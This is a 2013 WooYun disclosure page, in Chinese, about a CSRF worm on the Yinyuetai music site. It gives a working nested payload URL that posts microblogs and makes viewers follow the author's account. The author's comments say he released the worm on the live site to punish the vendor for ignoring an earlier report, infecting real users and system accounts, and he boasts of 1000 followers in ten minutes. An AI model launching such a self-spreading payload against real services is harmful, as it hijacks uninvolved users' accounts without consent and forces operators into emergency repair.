当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025342

漏洞标题:音悦台 ,无限刷粉丝,已经蠕虫,无限粉丝中传播

相关厂商:音悦台

漏洞作者: 小囧

提交时间:2013-06-07 13:32

修复时间:2013-07-22 13:33

公开时间:2013-07-22 13:33

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-07: 细节已通知厂商并且等待厂商处理中
2013-06-07: 厂商已经确认,细节仅向厂商公开
2013-06-17: 细节向核心白帽子及相关领域专家公开
2013-06-27: 细节向普通白帽子公开
2013-07-07: 细节向实习白帽子公开
2013-07-22: 细节向公众公开

简要描述:

好久没上wooyun然后看见一个厂商忽略一个csrf 真心不应该。然后就尝试让他们知道下csrf的威力。

详细说明:

无意间看见的一个忽略的bug评论

2.png


3.png


上面信息得到是使用的request
然后顺藤摸瓜得到发微博的请求地址:

1.png


然后发现 发微博的时候图片地址没有限制或者过滤,
那么我们就用img 的 src 来构造 csrf蠕虫 传播微博
http://i.yinyuetai.com/wb/post/doPost.action?content=aa&picture=http%3A%2F%2Fi.yinyuetai.com%2Fwb%2Fpost%2FdoPost.action%3Fcontent%3Dc%26picture%3Dhttp%253A%252F%252Fi.yinyuetai.com%252Fwb%252Fpost%252FdoPost.action%253Fcontent%253Df%2526picture%253Dhttp%25253A%25252F%25252Fi.yinyuetai.com%25252Ffollow%25252Ffollow%25253Ffriendid%25253D20843262

5.png

漏洞证明:


被感染关注好友。。
f 的意思是加粉丝
c 的意思就是创建f那条微博

7.png


完成关注我 继续帮我传播..

8.png


修复方案:

注意csrf

版权声明:转载请注明来源 小囧@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-06-07 14:20

厂商回复:

漏洞不该忽略,不过原始发现人不是您,所以给评成中了。害的我们下午紧急部署,果然传播很迅猛。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-06-07 13:36 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    。。。这厂商的csrf蠕虫威力一般般。。

  2. 2013-06-07 13:37 | 海绵宝宝 ( 普通白帽子 | Rank:243 漏洞数:50 | 唯有梦想与好姑娘不可辜负.)

    这样他们才会着急

  3. 2013-06-07 13:52 | 小囧 ( 普通白帽子 | Rank:396 漏洞数:62 | 在通往牛B的路上一路狂奔)

    @px1624 好久没来了,,想买件T恤

  4. 2013-06-07 14:02 | 小囧 ( 普通白帽子 | Rank:396 漏洞数:62 | 在通往牛B的路上一路狂奔)

    已经大面积传播开了 ,。, 刷新下 就新增好多粉丝

  5. 2013-06-07 14:27 | 小囧 ( 普通白帽子 | Rank:396 漏洞数:62 | 在通往牛B的路上一路狂奔)

    @前途 @vip 传播很迅速的 10分钟不到 1000粉丝 ,,系统微博号都感染了。帮你们报仇了

  6. 2013-06-07 14:49 | 小囧 ( 普通白帽子 | Rank:396 漏洞数:62 | 在通往牛B的路上一路狂奔)

    @钱途 为什么礼物还是你的 !@!!

  7. 2013-06-07 20:38 | 钱途 ( 普通白帽子 | Rank:273 漏洞数:44 )

    @音悦台 现在后悔了吧。早起你们只要认真看一下。就啥都明白了。你不听啊!

  8. 2013-06-07 21:22 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @钱途 。。钱总V5

  9. 2013-07-09 16:31 | 半世倾尘 ( 路人 | Rank:29 漏洞数:8 | 努力)

    求csrf代码 研究下

  10. 2013-07-22 15:19 | Lee Swagger ( 路人 | Rank:28 漏洞数:5 | 洗洗睡吧)

    洞主终于发飙了 share 下思路

  11. 2013-07-22 20:01 | 纠结师 ( 实习白帽子 | Rank:53 漏洞数:12 | 传说中的废材)

    厂商怕怕的感觉..